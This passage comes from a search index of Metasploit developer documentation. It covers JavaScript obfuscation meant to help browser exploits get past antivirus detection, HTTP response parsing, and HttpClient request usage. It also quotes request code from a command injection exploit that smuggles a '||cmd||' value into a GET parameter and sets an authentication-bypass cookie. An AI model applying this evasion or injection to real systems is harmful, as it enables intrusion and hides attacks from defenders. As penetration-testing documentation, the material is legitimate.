    "content": "The ObfuscateJS class is like the rand_text_alpha technique on steroids, but even better. It allows you to replace symbol names such as variables, methods, classes, and namespaces. It can also obfuscate strings by either randomly using fromCharCode or unescape. And lastly, it can strip JavaScript comments, which is handy because exploits often are hard to understand and read so you need comments to remember why something is written in a specific way, but you don’t want to show or leak those comments in a pentest. To use ObfuscateJS, let’s use the MS12-063 example again to demonstrate. If you feel like following the steps yourself without writing a module, what you can do is go ahead and run msfconsole, and then switch to irb, like this: . $ ./msfconsole -q msf &amp;gt; irb [*] Starting IRB shell... &amp;gt;&amp;gt; . And then you are ready to go. The first thing you do with ObfuscateJS is you need to initialize it with the JavaScript you want to obfuscate, so in this case, begin like the following: . js = %Q| var arrr = new Array(); arrr[0] = windows.document.createElement(\"img\"); arrr[0][\"src\"] = \"a\"; | obfu = ::Rex::Exploitation::ObfuscateJS.new(js) . obfu should return a Rex::Exploitation::ObfuscateJS object. It allows you to do a lot of things, you can really just call methods, or look at the source to see what methods are available (with additional API documentation). But for demo purposes, we’ll showcase the most common one: the obfuscate method. To actually obfuscate, you need to call the obfuscate method. This method accepts a symbols argument that allows you to manually specify what symbol names (variables, methods, classes, etc) to obfuscate, it should be in a hash like this: . { 'Variables' =&amp;gt; [ 'var1', ... ], 'Methods' =&amp;gt; [ 'method1', ... ], 'Namespaces' =&amp;gt; [ 'n', ... ], 'Classes' =&amp;gt; [ { 'Namespace' =&amp;gt; 'n', 'Class' =&amp;gt; 'y'}, ... ] } . So if I want to obfuscate the variable arrr, and I want to obfuscate the src string, here’s how: . &amp;gt;&amp;gt; obfu.obfuscate('Symbols' =&amp;gt; {'Variables'=&amp;gt;['arrr']}, 'Strings' =&amp;gt; true) =&amp;gt; \"\\nvar QqLFS = new Array();\\nQqLFS[0] = windows.document.createElement(unescape(String.fromCharCode( 37, 54, 071, 045, 0x36, 0144, 37, 066, 067 )));\\nQqLFS[0][String.fromCharCode( 115, 0x72, 0143 )] = unescape(String.fromCharCode( 045, 0x36, 0x31 ));\\n\" . In some cases, you might actually want to know the obfuscated version of a symbol name. One scenario is calling a JavaScript function from an element’s event handler, such as this: . &amp;lt;html&amp;gt; &amp;lt;head&amp;gt; &amp;lt;script&amp;gt; function test() { alert(\"hello, world!\"); } &amp;lt;/script&amp;gt; &amp;lt;/head&amp;gt; &amp;lt;body onload=\"test();\"&amp;gt; &amp;lt;/body&amp;gt; &amp;lt;/html&amp;gt; . The obfuscated version would look like the following: . js = %Q| function test() { alert(\"hello, world!\"); } | obfu = ::Rex::Exploitation::ObfuscateJS.new(js) obfu.obfuscate('Symbols' =&amp;gt; {'Methods'=&amp;gt;['test']}, 'Strings' =&amp;gt; true) html = %Q| &amp;lt;html&amp;gt; &amp;lt;head&amp;gt; &amp;lt;script&amp;gt; #{js} &amp;lt;/script&amp;gt; &amp;lt;/head&amp;gt; &amp;lt;body onload=\"#{obfu.sym('test')}();\"&amp;gt; &amp;lt;/body&amp;gt; &amp;lt;/html&amp;gt; | puts html . ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-obfuscatejs-class",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-obfuscatejs-class"
  },"262": {
    "doc": "JavaScript Obfuscation",
    "title": "The JSObfu class",
    "content": "The JSObfu class used to be ObfuscateJS’ cousin, but it has been completely rewritten since September 2014, and packaged as a gem. The obfuscation is more complex and you can actually tell it to obfuscate multiple times. You also no longer have to manually specify what symbol names to change, it just knows. Trying JSObfu in Rex . Let’s get back to irb again to demonstrate how easy it is to use JSObfu: . $ ./msfconsole -q msf &amp;gt; irb [*] Starting IRB shell... &amp;gt;&amp;gt; . This time we’ll do a “hello world” example: . &amp;gt;&amp;gt; js = ::Rex::Exploitation::JSObfu.new %Q|alert('hello, world!');| =&amp;gt; alert('hello, world!'); &amp;gt;&amp;gt; js.obfuscate =&amp;gt; nil . And here’s the output: . window[(function () { var _d=\"t\",y=\"ler\",N=\"a\"; return N+y+_d })()]((function () { var f='d!',B='orl',Q2='h',m='ello, w'; return Q2+m+B+f })()); . Like ObfuscateJS, if you need to get the randomized version of a symbol name, you can still do that. We’ll demonstrate this with the following example: . &amp;gt;&amp;gt; js = ::Rex::Exploitation::JSObfu.new %Q|function test() { alert(\"hello\"); }| =&amp;gt; function test() { alert(\"hello\"); } &amp;gt;&amp;gt; js.obfuscate . Say we want to know the randomized version of the method name “test”: . &amp;gt;&amp;gt; puts js.sym(\"test\") _ . OK, double check right quick: . &amp;gt;&amp;gt; puts js function _(){window[(function () { var N=\"t\",r=\"r\",i=\"ale\"; return i+r+N })()](String.fromCharCode(0150,0x65,0154,0x6c,0x6f));} . Yup, that looks good to me. And finally, let’s try to obfuscate a few times to see how that goes: . &amp;gt;&amp;gt; js = ::Rex::Exploitation::JSObfu.new %Q|alert('hello, world!');| =&amp;gt; alert('hello, world!'); &amp;gt;&amp;gt; js.obfuscate(:iterations=&amp;gt;3) =&amp;gt; window[String[((function(){var s=(function () { var r=\"e\"; return r })(),Q=(function () { var I=\"d\",dG=\"o\"; return dG+I })(),c=String.fromCharCode(0x66,114),w=(function () { var i=\"C\",v=\"r\",f=\"omCh\",j=\"a\"; return f+j+v+i })();return c+w+Q+s;})())](('Urx'.length*((0x1*(01*(1*020+5)+1)+3)*'u'.length+('SGgdrAJ'.length-7))+(('Iac'.length*'XLR'.length+2)*'qm'.length+0)),(('l'.length*((function () { var vZ='k'; return vZ })()[((function () { var E=\"h\",t=\"t\",O=\"leng\"; return O+t+E })())]*(0x12*1+0)+'xE'.length)+'h'.length)*(function () { var Z='uA',J='tR',D='x'; return D+J+Z })()[((function () { var m=\"th\",o=\"g\",U=\"l\",Y=\"en\"; return U+Y+o+m })())]+'lLc'.length),('mQ'.length*(02*023+2)+('Tt'.length*'OEzGiMVf'.length+5)),(String.fromCharCode(0x48,0131)[((function () { var i=\"gth\",r=\"len\"; return r+i })())]*('E'.length*0x21+19)+(0x1*'XlhgGJ'.length+4)),(String.fromCharCode(0x69)[((function () { var L=\"th\",Q=\"n\",$=\"l\",I=\"g\",x=\"e\"; return $+x+Q+I+L })())]*('QC'.length*0x2b+3)+(01*26+1)))]((function(){var C=String[((function () { var w=\"rCode\",j=\"mCha\",A=\"fr\",B=\"o\"; return A+B+j+w })())]((6*0x10+15),('riHey'.length*('NHnex'.length*0x4+2)+4),(01*95+13),(1*('Z'.length*(0x1*(01*(0x3*6+5)+1)+18)+12)+46),(0x1*(01*013+6)+16)),JQ=String[((function () { var NO=\"ode\",T=\"rC\",HT=\"fromCha\"; return HT+T+NO })())](('J'.length*0x54+17),(0x2*051+26),('TFJAGR'.length*('ymYaSJtR'.length*'gv'.length+0)+12),(01*0155+2),(0xe*'FBc'.length+2),(0x1*22+10),(3*(01*043+1)+11)),g=(function(){var N=(function () { var s='h'; return s })();return N;})();return g+JQ+C;})()); . Using JSObfu for module development . When you are writing a module, you should not call Rex directly like the above examples. Instead, you should be using the #js_obfuscate method found in JSObfu mixin. When you’re using JavaScript in your module, always do write it like this: . # This returns a Rex::Exploitation::JSObfu object js = js_obfuscate(your_code) . Note that by default, even though your module is calling the #js_obfuscate method, obfuscation will not kick in unless the user sets the JsObfuscate datastore option. This option is an OptInt, which allows you to set the number of times to obfuscate (default is 0). ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-jsobfu-class",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html#the-jsobfu-class"
  },"263": {
    "doc": "JavaScript Obfuscation",
    "title": "JavaScript Obfuscation",
    "content": "Stealth is an important feature to think about during exploit development. If your exploit gets caught all the time, it doesn’t matter how awesome or how technically challenging your exploit is, it is most likely not very usable in a real penetration test. Browser exploits in particular, heavily rely on JavaScript to trigger vulnerabilities, therefore a lot of antivirus or signature-based intrusion detection/prevention systems will scan the JavaScript and flag specific lines as malicious. The following code used to be considered as MS12-063 by multiple antivirus vendors even though it is not necessarily harmful or malicious, we’ll use this as an example throughout the wiki: . var arrr = new Array(); arrr[0] = windows.document.createElement(\"img\"); arrr[0][\"src\"] = \"a\"; . To avoid getting flagged, there are some common evasive tricks we can try. For example, you can manually modify the code a little bit to make it not recognizable by any signatures. Or if the antivirus relies on cached webpages to scan for exploits, it is possible to make the browser not cache your exploit so you stay undetected. Or in this case, you can obfuscate your code, which is what this writeup will focus on. In Metasploit, there are three common ways to obfuscate your JavaScript. The first one is simply by using the rand_text_alpha method (in Rex) to randomize your variables. The second one is by using the ObfuscateJS class. And the third option is the JSObfu class. ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/how-to-obfuscate-javascript-in-metasploit.html"
  },"264": {
    "doc": "How to parse an HTTP response",
    "title": "Getting a response",
    "content": "To get a response, you can either use Rex::Proto::Http::Client, or the HttpClient mixin to make an HTTP request. If you are writing a module, you should use the mixin. The following is an example of using the #send_request_cgi method from HttpClient: . res = send_request_cgi({'uri'=&amp;gt;'/index.php'}) . The return value for res is a Rex::Proto::Http::Response object, but it’s also possible you get a NilClass due to a connection/response timeout. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#getting-a-response",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#getting-a-response"
  },"265": {
    "doc": "How to parse an HTTP response",
    "title": "Getting the response body",
    "content": "With a Rex::Proto::Http::Response object, here’s how you can retrieve the HTTP body: . data = res.body . If you want to get the raw HTTP response (including the response message/code, headers, body, etc), then you can simply do: . raw_res = res.to_s . However, in this documentation we are only focusing on res.body. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#getting-the-response-body",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#getting-the-response-body"
  },"266": {
    "doc": "How to parse an HTTP response",
    "title": "Choosing the right parser",
    "content": "| Format | Parser | . | HTML | Nokogiri | . | XML | Nokogiri | . | JSON | JSON | . If the format you need to parse isn’t on the list, then fall back to res.body. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#choosing-the-right-parser",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#choosing-the-right-parser"
  },"267": {
    "doc": "How to parse an HTTP response",
    "title": "Parsing HTML with Nokogiri",
    "content": "When you have a Rex::Proto::Http::Response with HTML in it, the method to call is: . html = res.get_html_document . This will give you a Nokogiri::HTML::Document, which allows you use the Nokogiri API. There are two common methods in Nokogiri to find elements: #at and #search. The main difference is that the #at method will only return the first result, while the #search will return all found results (in an array). Consider the following example as your HTML response: . &amp;lt;html&amp;gt; &amp;lt;head&amp;gt; &amp;lt;title&amp;gt;Hello, World!&amp;lt;/title&amp;gt; &amp;lt;/head&amp;gt; &amp;lt;body&amp;gt; &amp;lt;div class=\"greetings\"&amp;gt; &amp;lt;div id=\"english\"&amp;gt;Hello&amp;lt;/div&amp;gt; &amp;lt;div id=\"spanish\"&amp;gt;Hola&amp;lt;/div&amp;gt; &amp;lt;div id=\"french\"&amp;gt;Bonjour&amp;lt;/div&amp;gt; &amp;lt;/div&amp;gt; &amp;lt;/body&amp;gt; &amp;lt;html&amp;gt; . Basic usage of #at . If the #at method is used to find a DIV element: . html = res.get_html_document greeting = html.at('div') . Then the greeting variable should be a Nokogiri::XML::Element object that gives us this block of HTML (again, because the #at method only returns the first result): . &amp;lt;div class=\"greetings\"&amp;gt; &amp;lt;div id=\"english\"&amp;gt;Hello&amp;lt;/div&amp;gt; &amp;lt;div id=\"spanish\"&amp;gt;Hola&amp;lt;/div&amp;gt; &amp;lt;div id=\"french\"&amp;gt;Bonjour&amp;lt;/div&amp;gt; &amp;lt;/div&amp;gt; . Grabbing an element from a specific element tree . html = res.get_html_document greeting = html.at('div//div') . Then the greeting variable should give us this block of HTML: . &amp;lt;div id=\"english\"&amp;gt;Hello&amp;lt;/div&amp;gt; . Grabbing an element with a specific attribute . Let’s say I don’t want the English Hello, I want the Spanish one. Then we can do: . html = res.get_html_document greeting = html.at('div[@id=\"spanish\"]') . Grabbing an element with a specific text . Let’s say I only know there’s a DIV element that says “Bonjour”, and I want to grab it, then I can do: . html = res.get_html_document greeting = html.at('//div[contains(text(), \"Bonjour\")]') . Or let’s say I don’t know what element the word “Bonjour” is in, then I can be a little vague about this: . html = res.get_html_document greeting = html.at('[text()*=\"Bonjour\"]') . Basic usage of #search . The #search method returns an array of elements. Let’s say we want to find all the DIV elements, then here’s how: . html = res.get_html_document divs = html.search('div') . Accessing text . When you have an element, you can always call the #text method to grab the text. For example: . html = res.get_html_document greeting = html.at('[text()*=\"Bonjour\"]') print_status(greeting.text) . The #text method can also be used as a trick to strip all the HTML tags: . html = res.get_html_document print_line(html.text) . The above will print: . \"\\n\\nHello, World!\\n\\n\\n\\nHello\\nHola\\nBonjour\\n\\n\\n\" . If you actually want to keep the HTML tags, then instead of calling #text, call #inner_html. Accessing attributes . With an element, simply call #attributes. Walking a DOM tree . Use the #next method to move on to the next element. Use the #previous method to roll back to the previous element. Use the #parent method to find the parent element. Use the #children method to get all the child elements. Use the #traverse method for complex parsing. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-html-with-nokogiri",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-html-with-nokogiri"
  },"268": {
    "doc": "How to parse an HTTP response",
    "title": "Parsing XML",
    "content": "To get the XML body from Rex::Proto::Http::Response, do: . xml = res.get_xml_document . The rest should be pretty similar to parsing HTML. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-xml",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-xml"
  },"269": {
    "doc": "How to parse an HTTP response",
    "title": "Parsing JSON",
    "content": "To get the JSON body from Rex::Proto::Http::Response, do: . json = res.get_json_document . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-json",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#parsing-json"
  },"270": {
    "doc": "How to parse an HTTP response",
    "title": "References",
    "content": ". | https://nokogiri.org/tutorials/parsing_an_html_xml_document.html | How to send an HTTP request using Rex Proto Http Client | How to Send an HTTP Request Using HttpClient | . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#references",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html#references"
  },"271": {
    "doc": "How to parse an HTTP response",
    "title": "How to parse an HTTP response",
    "content": "This document talks about how to parse an HTTP response body in the cleanest way possible. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-parse-an-http-response.html"
  },"272": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "There are mainly two common methods you will see:",
    "content": ". | send_request_raw - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer send_request_cgi. If you wish to learn about how this method works, look at the documentation for Rex::Proto::Http::Client#request_raw. | . Here’s a basic example of how to use send_request_raw: . send_request_raw({'uri'=&amp;gt;'/index.php'}) . | send_request_cgi - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this. If you wish to learn about how this method works, check out Rex::Proto::Http::Client#request_cgi. | . Here’s a very basic example for send_request_cgi: . send_request_cgi({ 'method' =&amp;gt; 'GET', 'uri' =&amp;gt; '/hello_world.php', 'vars_get' =&amp;gt; { 'param_1' =&amp;gt; 'abc', 'param_2' =&amp;gt; '123' } }) . Please note: send_request_raw and send_request_cgi will return a nil if there’s a timeout, so please make sure to account for that condition when you handle the return value. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#there-are-mainly-two-common-methods-you-will-see",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#there-are-mainly-two-common-methods-you-will-see"
  },"273": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "Cookies &amp;amp; CookieJars",
    "content": "Part of send_request_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient’s cookie_jar variable, an instance of the HttpCookieJar class. A HttpCookieJar is a collection of HttpCookie. The Jar can be populated manually with it’s add method, or automatically via the keep_cookies option that can be passed to send_request_cgi. If you need to clear the cookie jar (for instance, using a 2nd login), try: . cookie_jar.clear . keep_cookies option . Shown below is the request used to login to a gitlab account in the gitlab_file_read_rce exploit module . res = @http_client.send_request_cgi({ 'method' =&amp;gt; 'POST', 'uri' =&amp;gt; '/users/sign_in', 'keep_cookies' =&amp;gt; true, 'vars_post' =&amp;gt; { 'utf8' =&amp;gt; '✓', 'authenticity_token' =&amp;gt; csrf_token, 'user[login]' =&amp;gt; username, 'user[password]' =&amp;gt; password, 'user[remember_me]' =&amp;gt; 0 } }) . The cookies returned by the server with a successful login need to be attached to all future requests, so 'keep_cookies' =&amp;gt; true, is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests. cookie option . Shown below is the request used to login to a gitlab account in the artica_proxy_auth_bypass_service_cmds_peform_command_injection module . artica_proxy_auth_bypass_service_cmds_peform_command_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the cookie option, that string is set as the cookie header without any changes, allowing the exploit to be carried out. res = send_request_cgi({ 'method' =&amp;gt; 'GET', 'uri' =&amp;gt; normalize_uri(target_uri.path, 'cyrus.index.php'), 'vars_get' =&amp;gt; { 'service-cmds-peform' =&amp;gt; \"||#{Rex::Text.uri_encode(cmd, 'hex-all')}||\" }, 'cookie' =&amp;gt; \"PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1\" }) . Any object passed to cookie that isn’t an instance of HttpCookieJar will have to_s called on it. The result of to_s will be set as the cookie header of the http request. The contents of the HttpClient cookie_jar is ignored only this request. Subsequent requests are unaffected. Module authors can also pass an instance of HttpCookieJar with the cookie option: . cj = Msf::Exploit::Remote::HTTP::HttpCookieJar.new cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('PHPSESSID', @phpsessid)) cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('AsWebStatisticsCooKie', 1)) cj.add(Msf::Exploit::Remote::HTTP::HttpCookie.new('shellinaboxCooKie', 1)) res = send_request_cgi({ 'method' =&amp;gt; 'GET', 'uri' =&amp;gt; normalize_uri(target_uri.path, 'cyrus.index.php'), 'vars_get' =&amp;gt; { 'service-cmds-peform' =&amp;gt; \"||#{Rex::Text.uri_encode(cmd, 'hex-all')}||\" }, 'cookie' =&amp;gt; cj }) . The above code would create an identical cookie header to the one used in the previous example, save for a random ordering of the name value pairs. This shouldn’t affect how the server would read the cookies, but it’s still worth keeping in mind if you’ve somehow found a vuln reliant on the order of cookies in a header. expire_cookies . send_request_cgi will call cleanup on cookie_jar before iot is used to populate a request with cookies. cleanup will remove any expired cookies permenetly from the jar, affecting all future requests. If this behaviour isn’t deisred and an author would prefer to keep expired cookies in the jar, the expire_cookies option can be set to false: . res = send_request_cgi({ 'method' =&amp;gt; 'GET', 'uri' =&amp;gt; normalize_uri(target_uri.path, 'cyrus.index.php'), 'vars_get' =&amp;gt; { 'service-cmds-peform' =&amp;gt; \"||#{Rex::Text.uri_encode(cmd, 'hex-all')}||\" }, 'cookie' =&amp;gt; \"PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1\", 'expire_cookies' =&amp;gt; false }) . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#cookies--cookiejars",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#cookies--cookiejars"
  },"274": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "URI Parsing",
    "content": "Before you send a HTTP request, you will most likely have to do some URI parsing. This is a tricky task, because sometimes when you join paths, you may accidentally get double slashes, like this: “/test//index.php”. Or for some reason you have a missing slash. These are really commonly made mistakes. So here’s how you can handle it safely: . 1 - Register your default URI datastore option as ‘TARGETURI’: . Example: . register_options( [ OptString.new('TARGETURI', [true, 'The base path to XXX application', '/xxx_v1/']) ] ) . 2 - Load your TARGETURI with target_uri, that way the URI input validation will kick in, and then you get a real URI object: . In this example, we’ll just load the path: . uri = target_uri.path . 3 - When you want to join another URI, always use normalize_uri: . Example: . # Returns: \"/xxx_v1/admin/upload.php\" uri = normalize_uri(uri, 'admin', 'upload.php') . 4 - When you’re done normalizing the URI, you’re ready to use send_request_cgi or send_request_raw . Please note: The normalize_uri method will always follow these rules: . | The URI should always begin with a slash. | You will have to decide if you need the trailing slash or not. | There should be no double slashes. | . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#uri-parsing",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#uri-parsing"
  },"275": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "Full Example",
    "content": "class MetasploitModule &amp;lt; Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'HttpClient Example', 'Description' =&amp;gt; %q{ Do a send_request_cgi() }, 'Author' =&amp;gt; [ 'sinn3r' ], 'License' =&amp;gt; MSF_LICENSE ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path', '/']) ] ) end def run uri = target_uri.path res = send_request_cgi({ 'method' =&amp;gt; 'GET', 'uri' =&amp;gt; normalize_uri(uri, 'admin', 'index.php'), 'vars_get' =&amp;gt; { 'p1' =&amp;gt; 'This is param 1', 'p2' =&amp;gt; 'This is param 2' } }) if res &amp;amp;&amp;amp; res.code == 200 print_good('I got a 200, awesome') else print_error('No 200, feeling blue') end end end . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#full-example",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#full-example"
  },"276": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "Working with Burp Suite",
    "content": "Burp Suite is a useful tool to examine or modify HTTPS traffic while developing a module using HttpClient. To do this: . | Start Burp: java -jar burpsuite.jar | In Burp, click on the Proxies tab, and then Options. Configure the proxy listener there. In this example, let’s say we have a listener on port 6666. | Once the Burp listener is up, start msfconsole and load the module you’re working on. | Enter: set Proxies HTTP:127.0.0.1:6666 | Go ahead and run the module, Burp should intercept the HTTPS traffic. | . Note that Burp only supports HTTPS for HttpClient. This problem is only specific to Burp and Metasploit. If you need to examine HTTP traffic for HttpClient, a workaround is adding the following method in your module. This will override HttpClient’s send_request_* method, and return the modified output: . def send_request_cgi(opts) res = super(opts) puts res.request.to_s puts puts res.to_s puts puts end . You can do the same for send_request_raw as well. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#working-with-burp-suite",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#working-with-burp-suite"
  },"277": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "Other Common questions:",
    "content": "1 - Can I use vars_get and vars_post together? . Yes. When you supply a hash to vars_get, basically it means “put all this data in the query string”. When you supply a hash to vars_post, it means “put all this data in the body.” All of them will be in the same request. You do need to make sure you’re using send_request_cgi, of course. 2 - I can’t use vars_get or vars_post due to some weird reason, what to do? . Do mention about this problem in the code (as a comment). If you can’t use vars_post, you can try the data key instead, which will send your post data raw. Normally, the most common solution to get around vars_get is to leave your stuff in the uri key. msftidy will flag this, but only as an “Info” and not a warning, which means you should still pass msftidy anyway. If this is a common problem, we can always change msftidy. 3 - Do I need to manually do basic auth? . You do not need to manually do basic auth in your request, because HttpClient should automatically do that for you. All you have to do is set the username and password in the datastore options, and then the mixin will use that when the web server asks. 4 - How do I send a MIME request? . See Rex::MIME::Message . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#other-common-questions",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#other-common-questions"
  },"278": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "References",
    "content": ". | How to send an HTTP request using Rex Proto Http Client | . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#references",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#references"
  },"279": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "How to Send an HTTP Request Using HttpClient",
    "content": "The HttpClient mixin can be included with an exploit module in order to facilitate easier HTTP communications with a target machine. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html"
  },"280": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "How to send an HTTP request using Rex::Proto::Http::Client",
    "content": "The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the lib/msf/core directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the Msf::Exploit::Remote::HttpClient mixin (which is found in lib/msf/core/exploit/http/client) is most likely the one you want. However, in some scenarios, you actually can’t use the HttpClient mixin. The most common is actually when writing a form-based login module using the LoginScanner API. If you find yourself in that situation, use Rex::Proto::Http::Client. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#how-to-send-an-http-request-using-rexprotohttpclient",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#how-to-send-an-http-request-using-rexprotohttpclient"
  },"281": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "Initializing Rex::Proto::Http::Client",
    "content": "The Rex::Proto::Http::Client initializer creates a new HTTP client instance, and the most important piece is this: . def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil, username = '', password = '') . As you can use, only the host argument is required, the rest are optional. But let’s go over all of them right quick: . | Argument name | Data type | Description | . | host | String | Target host IP | . | port | Fixnum | Target host port | . | context | Hash | Determines what is responsible for requesting that a socket can be created | . | ssl | Boolean | True to enable it | . | ssl_version | String | SSL2, SSL3, or TLS1 | . | proxies | String | Configure a proxy | . | username | String | Username for automatic authentication | . | password | String | Password for automatic authentication | . Code example of initialing Rex::Proto::Http::Client: . cli = Rex::Proto::Http::Client.new(rhost, rport, {}, true, 8181, proxies, 'username', 'password') . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#initializing-rexprotohttpclient",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#initializing-rexprotohttpclient"
  },"282": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "Making an HTTP request",
    "content": "Even though our main topic of this documentation is about Rex::Proto::Http::Client, it does not know how to make HTTP requests. Instead, Rex::Proto::Http::ClientRequest is actually the mother of all Metasploit’s HTTP requests. So how does Rex::Proto::Http::ClientRequest give birth to an HTTP request? Well, you see son, it all begins when Rex::Proto::Http::Client asks for one with either the #request_cgi or the #request_raw method. The difference is that if #request_cgi is used, the request is meant to be CGI compatible, and in most cases this is what you want. If #request_raw is used, technically it means less options, less CGI compatible. A raw HTTP request supports the following options: . | Option/key name | Data type | Description | . | query | String | Raw GET query string | . | data | String | Raw POST data string | . | uri | String | Raw URI string | . | ssl | Boolean | True to use https://, otherwise http:// | . | agent | String | User-Agent. Default is: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | . | method | String | HTTP method | . | proto | String | Protocol | . | version | String | Version | . | vhost | String | Host header | . | port | Fixnum | Port for the host header | . | authorization | String | The authorization header | . | cookie | String | The cookie header | . | connection | String | The connection header | . | headers | Hash | A hash of custom headers. Safer than raw_headers | . | raw_headers | String | A string of raw headers | . | ctype | String | Content type | . An example of using #request_raw’s options: . # cli is a Rex::Proto::Http::Client object req = cli.request_raw({ 'uri' =&amp;gt;'/test.php', 'method' =&amp;gt; 'POST', 'data' =&amp;gt; 'A=B' }) . #request_cgi inherits all the above, and more: . | Option/key name | Data type | Description | . | pad_get_params | Boolean | Enable padding for GET parameters | . | pad_get_params_count | Fixnum | Number of random GET parameters. You also need pad_get_params for this | . | vars_get | Hash | A hash of GET parameters | . | encode_params | Boolean | Enable URI encoding for GET or POST parameters | . | pad_post_params | Boolean | Enable padding for POST parameters | . | pad_post_params_count | Fixnum | Number of random POST parameters. You also need pad_post_params for this | . An example of using one of #request_cgi options: . # cli is a Rex::Proto::Http::Client object req = cli.request_cgi({ 'uri' =&amp;gt;'/test.php', 'vars_get' =&amp;gt; { 'param1' =&amp;gt; 'value', 'param2' =&amp;gt; 'value' } }) . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#making-an-http-request",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#making-an-http-request"
  },"283": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "Sending an HTTP request",
